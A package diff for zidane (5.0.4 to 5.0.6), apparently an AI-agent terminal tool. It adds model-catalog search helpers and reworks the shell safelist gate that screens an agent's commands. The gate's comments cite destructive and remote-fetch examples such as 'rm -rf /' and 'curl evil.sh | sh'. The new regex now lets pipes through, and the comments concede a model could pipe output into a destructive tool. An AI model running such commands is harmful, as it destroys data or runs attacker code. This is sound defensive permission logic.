zidane 5.0.4 → 5.0.6

package/dist/{turn-operations-BF3hMNgo.js → turn-operations-BfEh-GER.js}

@@ -2620,6 +2620,79 @@ function buildMcpServers(opts) {
 	return opts.discovered.filter((d) => allow.has(d.config.name)).map((d) => d.config);
 }
 //#endregion
+//#region src/chat/model-catalog.ts
+/**
+* Build the unified catalog from a list of available providers.
+*
+* Provider order is preserved (callers typically pass the picker order
+* — alphabetical, auth-detection order, etc.); model order inside each
+* provider matches whatever `modelsFor` returns. The current selection
+* (when set) is bubbled to the top of its provider's section so it
+* shows first without disturbing relative ordering elsewhere.
+*
+* `modelsFor` is injected (not imported from `./providers`) so the same
+* helper works with hosts that supply their own model resolver via
+* `ResolvedConfig.modelsFor`.
+*/
+function buildModelCatalog(opts) {
+	const entries = [];
+	for (const provider of opts.providers) {
+		const models = opts.modelsFor(provider.key);
+		if (models.length === 0) continue;
+		let ordered = models;
+		if (opts.current?.providerKey === provider.key) {
+			const idx = models.findIndex((m) => m.id === opts.current?.modelId);
+			if (idx > 0) {
+				const next = models.slice();
+				const [active] = next.splice(idx, 1);
+				next.unshift(active);
+				ordered = next;
+			}
+		}
+		for (const model of ordered) entries.push({
+			providerKey: provider.key,
+			providerLabel: provider.label,
+			model,
+			searchCorpus: buildSearchCorpus(provider, model)
+		});
+	}
+	return entries;
+}
+/**
+* Filter `catalog` by a user query. Empty / whitespace-only queries
+* pass everything through unchanged (`O(1)` short-circuit). Multi-term
+* queries (space-separated) require EVERY term to appear somewhere in
+* the entry's search corpus — so `"claude opus"` matches `claude-opus-4`
+* regardless of how the words are interleaved with provider names.
+*
+* Match is case-insensitive (the corpus is pre-lowercased; the query
+* is lowercased once per call).
+*/
+function filterModelCatalog(catalog, query) {
+	const trimmed = query.trim().toLowerCase();
+	if (!trimmed) return catalog.slice();
+	const terms = trimmed.split(/\s+/);
+	return catalog.filter((entry) => terms.every((t) => entry.searchCorpus.includes(t)));
+}
+/**
+* Find a catalog entry's index by its `{providerKey, modelId}` tuple.
+* Returns `-1` when not present. Useful when re-rendering the picker
+* (a query just narrowed the list, where did the selection land?).
+*/
+function indexOfEntry(catalog, target) {
+	if (!target) return -1;
+	return catalog.findIndex((e) => e.providerKey === target.providerKey && e.model.id === target.modelId);
+}
+function buildSearchCorpus(provider, model) {
+	return [
+		provider.key,
+		provider.label,
+		model.id,
+		model.name ?? "",
+		model.provider ?? ""
+	].join(" ").toLowerCase();
+}
+//#endregion
 //#region src/chat/oauth.ts
 function supportsOAuth(descriptor) {
 	return descriptor.oauthProvider !== void 0;
@@ -2826,43 +2899,74 @@ function primaryArgValue(input) {
 	}
 	return "";
 }
-/** Extract the first whitespace-delimited token of the primary arg. */
-function primaryArgToken(input) {
-	return primaryArgValue(input).split(/\s+/)[0] ?? "";
-}
 /**
-* Shell metacharacters that turn a single command into a compound: pipes,
-* sequencing, redirects, substitutions, line breaks, subshells. A `shell:git:*`
-* entry is meant to greenlight "any git invocation" — without this guard,
-* `git status && rm -rf /` would tokenize to `git` and pass the safelist
-* unchallenged. Reject any command that's not a single program call.
-*
-* The regex is intentionally generous: false positives (e.g. `echo "hi & bye"`)
-* just prompt the user again, which is the safe failure mode.
+* Extract the first whitespace-delimited token of the primary arg.
+* Leading whitespace is trimmed first so `"  git status"` tokenizes to
+* `"git"`, not `""` (an empty first element from `.split(/\s+/)`).
 */
-const SHELL_COMPOUND_RE = /[;&|<>`$\n\r()]/;
-function isCompoundShellCommand(command) {
-	return SHELL_COMPOUND_RE.test(command);
+function primaryArgToken(input) {
+	return primaryArgValue(input).trim().split(/\s+/)[0] ?? "";
+}
+/**
+* Shell features that introduce a SECOND, UNRELATED command into the
+* pipeline — and would silently bypass a `shell:<head>:*` safelist that
+* the user only meant to cover the head program. We block these
+* specifically:
+*
+*   - `;`         — sequence operator (`git status; rm -rf /`)
+*   - `&&` / `||` — and-/or-chains (`git status && curl evil.sh | sh`)
+*   - `\n` / `\r` — multi-line scripts, equivalent to `;`
+*   - `` ` ``     — backtick command substitution (`echo \`rm -rf /\``)
+*   - `$(…)`      — modern command substitution (`echo $(rm -rf /)`)
+*
+* We deliberately do NOT block:
+*
+*   - `|`         — pipes; required for the bread-and-butter CLI pattern
+*                   `sentry issue list … | jq -r '.[]'`.
+*   - `>` / `>>` / `<` / `2>&1` — I/O redirection; `cmd > out.txt` and
+*                   `cmd 2>&1 | jq` are normal CLI usage.
+*   - `&` (alone) — backgrounding; runs the same command in the background
+*                   rather than chaining a new one.
+*   - `(…)`       — subshells; rare in practice, and the chaining
+*                   detectors above already catch the dangerous content
+*                   that would typically live inside them.
+*
+* Trade-off: a model that controls the output of the safelisted head
+* command could in principle pipe garbage into a destructive tool
+* (`sentry list | sh`). The original implementation blocked all
+* metacharacters to avoid that risk, but it made `shell:<head>:*`
+* unusable for real CLI workflows — users hit the prompt on every
+* `cmd | jq` and learned to ignore the modal. Allowing pipes/redirects
+* trusts the user's explicit "I want everything starting with <head>"
+* decision; the chaining rejections above keep the obvious escape
+* hatches closed.
+*
+* The regex is intentionally generous: false positives (e.g. a literal
+* `&&` inside a quoted argument) just prompt the user again, which is
+* the safe failure mode.
+*/
+const SHELL_CHAINING_RE = /&&|\|\||\$\(|[;`\n\r]/;
+function hasShellChaining(command) {
+	return SHELL_CHAINING_RE.test(command);
 }
 /**
 * Test whether a `{ tool, input }` pair is covered by one safelist entry.
 *
 * Supported entry shapes:
-*   - `"<tool>"` — broad match on tool name. For `shell` this still requires
-*     a single-program command (compound forms always prompt).
-*   - `"<tool>:<token>:*"` — match when the primary arg's first token equals
-*     `<token>`. For `shell`, also requires the command to be free of
-*     metacharacters (`;`, `&&`, `||`, `|`, `$(`, backticks, `>`, `<`,
-*     newlines, subshells) — otherwise a `shell:git:*` entry would silently
-*     greenlight `git status && rm -rf /`.
-*
-* Entries that don't fit either shape are ignored (forward-compat for future
-* pattern syntax — readers shouldn't choke on entries written by a newer
-* version of the TUI).
+*   - `"<tool>"` — broad match on tool name. For `shell`, the command
+*     must not chain through another program (see {@link SHELL_CHAINING_RE}).
+*   - `"<tool>:<token>:*"` — match when the primary arg's first token
+*     equals `<token>`. For `shell`, same chaining gate as above. Pipes
+*     and redirects are allowed so `shell:sentry:*` covers the typical
+*     `sentry … | jq …` workflow.
+*
+* Entries that don't fit either shape are ignored (forward-compat for
+* future pattern syntax — readers shouldn't choke on entries written
+* by a newer version of the TUI).
 */
 function matchesSafelistEntry(entry, tool, input) {
 	if (tool === "shell") {
-		if (isCompoundShellCommand(typeof input.command === "string" ? input.command : "")) return false;
+		if (hasShellChaining(typeof input.command === "string" ? input.command : "")) return false;
 	}
 	if (entry === tool) return true;
 	const sep = entry.indexOf(":");
@@ -3601,6 +3705,6 @@ function countNeighbors(turnIds, turnId) {
 	};
 }
 //#endregion
-export { BUILTIN_THEMES as $, piIdOf as $t, readProjects as A, applyInsert as At, cleanTitle as B, removeProviderCredential as Bt, useSafeModeQueue as C, findGitRoot$1 as Ct, isOnSafelist as D, FILES_TRIGGER as Dt, getSafelist as E, uniqueSkillNamesFromReferences as Et, supportsOAuth as F, detectAuth as Ft, shortId as G, cerebrasDescriptor as Gt, ageString as H, writeCredentials as Ht, buildMcpServers as I, applyApiKeyEnv as It, DEFAULT_SETTINGS as J, getModelInfo as Jt, listProjectFiles as K, credKeyOf as Kt, defaultMcpsConfigPaths as L, credentialsPath as Lt, writeProjects as M, findActiveTrigger as Mt, splitPromptSegments as N, mergeReferences as Nt, matchesSafelistEntry as O, createFilesCompletionProvider as Ot, runOAuthLogin as P, useCompletion as Pt, useSettings as Q, openrouterDescriptor as Qt, discoverProjectMcps as R, readCredentials as Rt, useSafeModeActions as S, toolResultText as St, addToSafelist as T, createSkillsCompletionProvider as Tt, compactPath as U, BUILTIN_PROVIDERS as Ut, generateSessionTitle as V, setProviderCredential as Vt, fmtTokens as W, anthropicDescriptor as Wt, SETTINGS_TOGGLES as X, modelsForDescriptor as Xt, SETTINGS_CHOICES as Y, modelSupportsReasoning as Yt, SettingsProvider as Z, openaiDescriptor as Zt, discoverProjectSkills as _, saveState as _t, ThemeProvider as a, singleAgentRegistry as an, CATPPUCCIN_LATTE as at, writeSessionExport as b, titleFromTurns as bt, useSurfaces as c, ConfigProvider as ct, finalizeStreamingMarkdown as d, createStateStore as dt, BUILD_AGENT as en, DEFAULT_THEME as et, finalizeStreamingMarkdownForOwner as f, deriveSessionTitle as ft, defaultSkillScanPaths as g, loadState as gt, buildSkillsConfig as h, listSessionMeta as ht, turnAsText as i, resolveAgentId as in, CATPPUCCIN_FRAPPE as it, suggestSafelistEntry as j, collectReferences as jt, projectsFilePath as k, uniqueFilesFromReferences as kt, useSyntaxStyles as l, useConfig as lt, useStreamBuffer as m, lastContextSizeFromTurns as mt, deleteTurnSafely as n, DEFAULT_AGENT_ID as nn, resolveTheme as nt, useColors as o, CATPPUCCIN_MACCHIATO as ot, turnContextSize as p, eventsFromTurns as pt, useEnabledToggleSet as q, getContextWindow as qt, truncateTurnsAt as r, PLAN_AGENT as rn, VAPORWAVE_THEME as rt, useSelectStyle as s, CATPPUCCIN_MOCHA as st, countNeighbors as t, BUILTIN_AGENTS as tn, resolveChipColor as tt, useTheme as u, resolveConfig as ut, renderSession as v, selectableTurnIds as vt, IMPLICITLY_SAFE_TOOLS as w, SKILLS_TRIGGER as wt, SafeModeProvider as x, toolCallPreview as xt, resolveSessionExportTarget as y, stripSpawnTokensLine as yt, parseMcpsFile as z, readProviderCredential as zt };
+export { SETTINGS_TOGGLES as $, modelsForDescriptor as $t, readProjects as A, FILES_TRIGGER as At, defaultMcpsConfigPaths as B, credentialsPath as Bt, useSafeModeQueue as C, titleFromTurns as Ct, isOnSafelist as D, SKILLS_TRIGGER as Dt, getSafelist as E, findGitRoot$1 as Et, supportsOAuth as F, findActiveTrigger as Ft, ageString as G, writeCredentials as Gt, parseMcpsFile as H, readProviderCredential as Ht, buildModelCatalog as I, mergeReferences as It, shortId as J, cerebrasDescriptor as Jt, compactPath as K, BUILTIN_PROVIDERS as Kt, filterModelCatalog as L, useCompletion as Lt, writeProjects as M, uniqueFilesFromReferences as Mt, splitPromptSegments as N, applyInsert as Nt, matchesSafelistEntry as O, createSkillsCompletionProvider as Ot, runOAuthLogin as P, collectReferences as Pt, SETTINGS_CHOICES as Q, modelSupportsReasoning as Qt, indexOfEntry as R, detectAuth as Rt, useSafeModeActions as S, stripSpawnTokensLine as St, addToSafelist as T, toolResultText as Tt, cleanTitle as U, removeProviderCredential as Ut, discoverProjectMcps as V, readCredentials as Vt, generateSessionTitle as W, setProviderCredential as Wt, useEnabledToggleSet as X, getContextWindow as Xt, listProjectFiles as Y, credKeyOf as Yt, DEFAULT_SETTINGS as Z, getModelInfo as Zt, discoverProjectSkills as _, lastContextSizeFromTurns as _t, ThemeProvider as a, DEFAULT_AGENT_ID as an, resolveTheme as at, writeSessionExport as b, saveState as bt, useSurfaces as c, singleAgentRegistry as cn, CATPPUCCIN_LATTE as ct, finalizeStreamingMarkdown as d, ConfigProvider as dt, openaiDescriptor as en, SettingsProvider as et, finalizeStreamingMarkdownForOwner as f, useConfig as ft, defaultSkillScanPaths as g, eventsFromTurns as gt, buildSkillsConfig as h, deriveSessionTitle as ht, turnAsText as i, BUILTIN_AGENTS as in, resolveChipColor as it, suggestSafelistEntry as j, createFilesCompletionProvider as jt, projectsFilePath as k, uniqueSkillNamesFromReferences as kt, useSyntaxStyles as l, CATPPUCCIN_MACCHIATO as lt, useStreamBuffer as m, createStateStore as mt, deleteTurnSafely as n, piIdOf as nn, BUILTIN_THEMES as nt, useColors as o, PLAN_AGENT as on, VAPORWAVE_THEME as ot, turnContextSize as p, resolveConfig as pt, fmtTokens as q, anthropicDescriptor as qt, truncateTurnsAt as r, BUILD_AGENT as rn, DEFAULT_THEME as rt, useSelectStyle as s, resolveAgentId as sn, CATPPUCCIN_FRAPPE as st, countNeighbors as t, openrouterDescriptor as tn, useSettings as tt, useTheme as u, CATPPUCCIN_MOCHA as ut, renderSession as v, listSessionMeta as vt, IMPLICITLY_SAFE_TOOLS as w, toolCallPreview as wt, SafeModeProvider as x, selectableTurnIds as xt, resolveSessionExportTarget as y, loadState as yt, buildMcpServers as z, applyApiKeyEnv as zt };
 
-//# sourceMappingURL=turn-operations-BF3hMNgo.js.map
+//# sourceMappingURL=turn-operations-BfEh-GER.js.map